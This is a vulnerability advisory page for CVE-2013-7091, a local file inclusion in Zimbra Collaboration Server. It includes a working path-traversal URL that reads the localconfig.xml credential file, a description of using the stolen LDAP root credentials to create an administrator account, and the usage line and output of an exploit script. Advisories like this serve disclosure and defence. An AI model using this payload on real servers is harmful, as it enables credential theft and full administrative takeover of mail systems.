Zimbra 8.0.2 and 7.2.2 Collaboration Server LFI 2013-12-15 / 2013-12-23 Credit: rubina119 Risk: High Local: No Remote: Yes CVE: CVE-2013-7091 CWE: CWE-264

CVSS Base Score: 5/10 Impact Subscore: 2.9/10 Exploitability Subscore: 10/10 Exploit range: Remote Attack complexity: Low Authentication: No required Confidentiality impact: Partial Integrity impact: None Availability impact: None # Exploit Title: Zimbra 0day exploit / Privilegie escalation via LFI # Date: 06 Dec 2013 # Exploit Author: rubina119 # Contact Email : rubina119[at]gmail.com # Vendor Homepage: http://www.zimbra.com/ # Version: 2009, 2010, 2011, 2012 and early 2013 versions are afected, # Tested on: Centos(x), Ubuntu. # CVE : No CVE, no patch just 0Day # State : Critical # Mirror: http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip ---------------Description----------------- This script exploits a Local File Inclusion in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz which allows us to see localconfig.xml that contains LDAP root credentials wich allow us to make requests in /service/admin/soap API with the stolen LDAP credentials to create user with administration privlegies and gain acces to the Administration Console. LFI is located at : /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin= ../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 Example : https://mail.example.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz? v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 or https://mail.example.com:7071/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20 TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 ----------------Exploit----------------- Before use this exploit, target server must have admin console port open "7071" otherwise it won't work. use the exploit like this : ruby run.rb -t mail.example.com -u someuser -p Test123_23 [*] Looking if host is vuln.... [+] Host is vuln exploiting... [+] Obtaining Domain Name [+] Creating Account [+] Elevating Privileges [+] Login Credentials [*] Login URL : https://mail.example.com:7071/zimbraAdmin/ [*] Account : someuser@example.com [*] Password : Test123_23 [+] Successfully Exploited ! The number of servers vuln are huge like 80/100. This is only for educational purpouses. References: http://cxsecurity.com/issue/WLB-2013120155 http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip http://osvdb.org/100747



See this note in RAW Version Tweet Vote for this issue: 0 -1 0% 100%





Thanks for you vote!



Thanks for you comment!

Your message is in quarantine 48 hours. Comment it here. Nick (*) Email (*) Video Text (*)



(*) - required fields. Cancel Submit {{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} {{ x.ux * 1000 | date:'yyyy-MM-dd' }}CET+1 Show all comments Copyright 2020, cxsecurity.com